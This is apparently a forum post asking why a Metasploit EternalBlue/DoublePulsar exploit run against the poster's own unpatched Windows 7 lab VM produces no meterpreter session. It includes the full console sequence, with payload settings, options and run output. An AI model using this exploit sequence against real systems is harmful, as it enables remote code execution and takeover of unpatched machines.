Hi everyone,
I'm trying this exploit on a Windows 7 64-bit Ultimate virtual machine that has not been updated with the MS17-10 patch and has the antivirus disabled.
When I run the MS17-10 scanner it reports that the machine is vulnerable, but when I launch the exploit it doesn't create the meterpreter session.
I'm attaching the whole sequence; thanks for any help.
Code:
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(eternalblue_doublepulsar) > set targetarchitecture x64
targetarchitecture => x64
msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.73
RHOST => 192.168.1.73
msf exploit(eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/eternalblue_doublepulsar):

Name                Current Setting                                  Required  Description
----                ---------------                                  --------  -----------
DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
PROCESSINJECT       wlms.exe                                         yes       Name of process to inject into (Change to lsass.exe for x64)
RHOST               192.168.1.73                                     yes       The target address
RPORT               445                                              yes       The SMB service port (TCP)
TARGETARCHITECTURE  x64                                              yes       Target Architecture (Accepted: x86, x64)
WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path

Payload options (windows/x64/meterpreter/bind_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LPORT     4444             yes       The listen port
RHOST     192.168.1.73     no        The target address

Exploit target:

Id  Name
--  ----
8   Windows 7 (all services pack) (x86) (x64)

msf exploit(eternalblue_doublepulsar) > run
[*] Started bind handler
[*] 192.168.1.73:445 - Generating Eternalblue XML data
[*] 192.168.1.73:445 - Generating Doublepulsar XML data
[*] 192.168.1.73:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.73:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.73:445 - Launching Eternalblue...
[+] 192.168.1.73:445 - Backdoor is already installed
[*] 192.168.1.73:445 - Launching Doublepulsar...
[+] 192.168.1.73:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) >